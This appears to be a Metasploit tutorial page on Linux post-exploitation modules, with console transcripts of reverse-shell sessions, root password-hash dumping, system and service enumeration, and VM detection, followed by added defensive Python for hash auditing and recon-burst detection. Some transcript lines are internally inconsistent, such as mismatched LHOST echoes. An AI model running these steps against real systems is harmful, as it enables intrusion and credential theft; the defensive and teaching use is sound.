Linux Post Gather Modules

From Metasploit Unleashed

hashdump

The "hashdump" module will dump the password hashes for all users on a Linux system.

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set lhost lhost 192.168.1.101
lhost => lhost 192.168.1.101
msf exploit(handler) > exploit

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf exploit(handler) > set lhost 192.168.1.101
lhost => 192.168.184.130
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.101:40126) at 2011-06-02 15:46:03 -0400

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(handler) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   VERBOSE  false            no        Show list of Packages.

msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > run

[+] root:$6$f6jnFxJ7$3cOtDI64jpPqVi3F7I033BxVQqHP5MC4TAmXb.NkLa65MNaG2rbWe2te2AWwRuIA/NVVoVKoUSMYH2w0SuDYK0:0:0:root:/root:/bin/bash
…snip…
[+] Unshadowed Password File: /root/.msf3/loot/20110602154652_default_192.168.184.130_linux.hashes_130860.txt
[*] Post module execution completed
msf post(hashdump) >
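
The same data can be used for a defensive check. The output above is in passwd format with the hash in the second field, so the crypt(3) prefix of each entry shows which accounts still use weak or empty password storage. This is an added example, not part of the original page or of Metasploit; the scheme table and nologin shell list are assumptions, and the sample lines and hash bodies are constructed placeholders.

```python
# crypt(3) id prefix -> (scheme name, acceptable today); assumed table
SCHEMES = {
    "1": ("md5crypt", False),
    "2a": ("bcrypt", True), "2b": ("bcrypt", True), "2y": ("bcrypt", True),
    "5": ("sha256crypt", True),
    "6": ("sha512crypt", True),
    "y": ("yescrypt", True),
}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def classify_hash(field):
    """Return (scheme, acceptable) for the password field of one entry."""
    if field == "":
        return ("empty-password", False)
    if field[0] in "!*" or field == "x":
        return ("locked-or-absent", True)
    if field.startswith("$"):
        ident = field.split("$")[1]
        return SCHEMES.get(ident, ("unknown-" + ident, False))
    if len(field) == 13:
        return ("descrypt", False)  # traditional DES crypt: 2-char salt + 11
    return ("unrecognised", False)


def audit(lines):
    """Return one finding per account whose stored hash needs attention."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split(":")
        if len(parts) != 7:
            continue  # not a passwd-format record
        user, field, uid, _gid, _gecos, _home, shell = parts
        scheme, ok = classify_hash(field)
        if not ok:
            findings.append({"user": user, "scheme": scheme, "uid0": uid == "0",
                             "interactive": shell not in NOLOGIN_SHELLS})
    return findings


# Constructed sample records; the hash bodies are filler, not real hashes.
SAMPLE = [
    "root:$6$constructedsalt$" + "A" * 86 + ":0:0:root:/root:/bin/bash",
    "backup:$1$constructed$" + "B" * 22 + ":34:34:backup:/var/backups:/bin/sh",
    "daemon:*:1:1:daemon:/usr/sbin:/bin/sh",
    "legacy:abCONSTRUCTED:1001:1001::/home/legacy:/bin/bash",
    "svc::0:0::/:/bin/false",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```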


enum_services

The "enum_services" module will enumerate the services on a Linux system.

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set lhost 192.168.184.130
lhost => 192.168.184.130
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.184.130:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.184.130:4444 -> 192.168.184.130:45979) at 2011-06-02 16:19:00 -0400

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(handler) > use post/linux/gather/enum_services
msf post(enum_services) > show options

Module options (post/linux/gather/enum_services):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   VERBOSE  false            no        Show list of Packages.

msf post(enum_services) > set session 1
session => 1
msf post(enum_services) > run

[+] Info:
[+]     BackTrack 5 - Code Name Revolution 32 bit
[+]     Linux root 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
[*] Service list saved to loot file: /root/.msf3/loot/20110602161959_default_192.168.184.130_linux.services_184278.txt
[*] Post module execution completed
msf post(enum_services) >


root@kali:~# cat /root/.msf3/loot/20110602161959_default_192.168.184.130_linux.services_184278.txt
 [ ? ]  alsa-mixer-save
 [ - ]  apache2
 [ - ]  apparmor
 [ ? ]  apport
 [ ? ]  atd
 [ ? ]  avahi-daemon
 [ ? ]  binfmt-support
 [ - ]  bootlogd
 [ ? ]  bridge-network-interface
 [ - ]  casper
 [ ? ]  console-setup
 [ ? ]  cron
 [ ? ]  cryptdisks
 [ ? ]  cryptdisks-early
 [ ? ]  cryptdisks-enable
 [ ? ]  cryptdisks-udev
 [ - ]  cups
 [ ? ]  dbus
 [ ? ]  decnet
 [ ? ]  dmesg
 [ ? ]  dns-clean
 [ ? ]  ecryptfs-utils-restore
 [ ? ]  ecryptfs-utils-save
 [ ? ]  failsafe-x
 [ - ]  fancontrol
 [ - ]  farpd
 [ ? ]  framework-postgres
 [ - ]  gpsd
 [ - ]  grub-common
 [ ? ]  gssd
 [ ? ]  hostname
 [ ? ]  hwclock
 [ ? ]  hwclock-save
 [ ? ]  idmapd
 [ ? ]  irqbalance
 [ ? ]  killprocs
 [ - ]  lm-sensors
 [ ? ]  module-init-tools
 [ ? ]  mysql
 [ ? ]  nessusd
 [ ? ]  network-interface
 [ ? ]  network-interface-security
 [ ? ]  networking
 [ ? ]  ondemand
 [ ? ]  openvpn
 [ ? ]  pcscd
 [ ? ]  plymouth
 [ ? ]  plymouth-log
 [ ? ]  plymouth-splash
 [ ? ]  plymouth-stop
 [ ? ]  portmap
 [ ? ]  portmap-boot
 [ ? ]  portmap-wait
 [ ? ]  pppd-dns
 [ ? ]  procps
 [ + ]  pulseaudio
 [ ? ]  rc.local
 [ ? ]  rinetd
 [ ? ]  rpc_pipefs
 [ - ]  rsync
 [ ? ]  rsyslog
 [ ? ]  screen-cleanup
 [ ? ]  sendsigs
 [ - ]  snort
 [ + ]  ssh
 [ ? ]  statd
 [ ? ]  statd-mounting
 [ ? ]  stop-bootlogd
 [ ? ]  stop-bootlogd-single
 [ ? ]  ubiquity
 [ ? ]  udev
 [ ? ]  udev-finish
 [ ? ]  udevmonitor
 [ ? ]  udevtrigger
 [ ? ]  ufw
 [ ? ]  umountfs
 [ ? ]  umountnfs.sh
 [ ? ]  umountroot
 [ - ]  urandom
 [ - ]  wicd
 [ - ]  winbind
 [ ? ]  wpa-ifupdown


enum_linux

The "enum_linux" module gathers basic system information from a Linux system: it enumerates users, hashes, services, network configs, routing tables and installed packages, and collects a screenshot and bash_history.

msf post(enum_linux) > run

[*] Running module against bt
[*] Execute: /usr/bin/whoami
[*] Module running as root
[+] Info:
[+] 	BackTrack 5 - Code Name Revolution 32 bit 
[+] 	Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
[*] Collecting data...
[*] Execute: /bin/cat /etc/passwd | cut -d : -f 1
[*] Execute: /sbin/ifconfig -a
[*] Execute: /sbin/route
[*] Execute: /bin/mount -l
[*] Execute: /sbin/iptables -L
[*] Execute: /sbin/iptables -L -t nat
[*] Execute: /sbin/iptables -L -t mangle
[*] Download: /etc/resolv.conf
[*] Download: /etc/ssh/sshd_config
[*] Download: /etc/hosts
[*] Download: /etc/passwd
...snip...
[*] Post module execution completed
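
The "Execute:" lines above give a defender a recognisable pattern: several discovery binaries run by one session within seconds. The following is an added detection example, not part of the original page or of Metasploit, that flags such bursts in process-execution events. The event line format, the window and the threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Binaries taken from the "Execute:" lines in the enum_linux output above.
RECON_EXES = {"/usr/bin/whoami", "/bin/cat", "/sbin/ifconfig",
              "/sbin/route", "/bin/mount", "/sbin/iptables"}
# Assumed, simplified event format: "<epoch> ses=<id> uid=<n> exe=<path> ..."
EVENT_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?) ses=(?P<ses>\d+) uid=\d+ exe=(?P<exe>\S+)")


def detect_bursts(lines, window=30.0, min_distinct=4):
    """Return {session: sorted recon binaries} for every session that ran at
    least min_distinct different RECON_EXES within `window` seconds."""
    per_session = defaultdict(list)
    for line in lines:
        m = EVENT_RE.match(line)
        if m and m["exe"] in RECON_EXES:
            per_session[m["ses"]].append((float(m["ts"]), m["exe"]))
    alerts = {}
    for ses, events in per_session.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the left edge so the span never exceeds the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {exe for _, exe in events[start:end + 1]}
            if len(distinct) >= min_distinct:
                alerts[ses] = sorted(distinct)
                break
    return alerts


# Constructed events: session 7 is a scripted burst, session 3 is an
# administrator running the same tools spread over several minutes.
SAMPLE = [
    "1000.0 ses=7 uid=0 exe=/usr/bin/whoami",
    "1000.4 ses=7 uid=0 exe=/bin/cat argv=/etc/passwd",
    "1000.9 ses=7 uid=0 exe=/sbin/ifconfig argv=-a",
    "1001.3 ses=7 uid=0 exe=/sbin/route",
    "1001.8 ses=7 uid=0 exe=/bin/mount argv=-l",
    "100.0 ses=3 uid=1000 exe=/bin/mount",
    "400.0 ses=3 uid=1000 exe=/sbin/ifconfig",
    "900.0 ses=3 uid=1000 exe=/sbin/iptables argv=-L",
    "950.0 ses=3 uid=1000 exe=/bin/cat argv=/etc/hosts",
]

if __name__ == "__main__":
    print(detect_bursts(SAMPLE))
```

Because /bin/cat and similar tools are used constantly in normal administration, the signal is the number of distinct binaries per session and window, not any single execution.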


checkvm

The "checkvm" module attempts to determine whether the system is running inside a virtual environment and, if so, which one. This module supports detection of Hyper-V, VMware, VirtualBox, Xen, and QEMU/KVM.

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.184.129
lhost => 192.168.184.129
msf exploit(handler) > show options
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.184.129:4444 
[*] Starting the payload handler...
[*] Sending stage (36 bytes) to 192.168.184.129
[*] Command shell session 1 opened (192.168.184.129:4444 -> 192.168.184.129:52156) at 2011-06-20 12:37:55 -0400

^Z
Background session 1? [y/N]  y
msf exploit(handler) > use post/linux/gather/checkvm
msf post(checkvm) > show options

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(checkvm) > set session 1
session => 1
msf post(checkvm) > run

[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
[*] Post module execution completed
msf post(checkvm) >



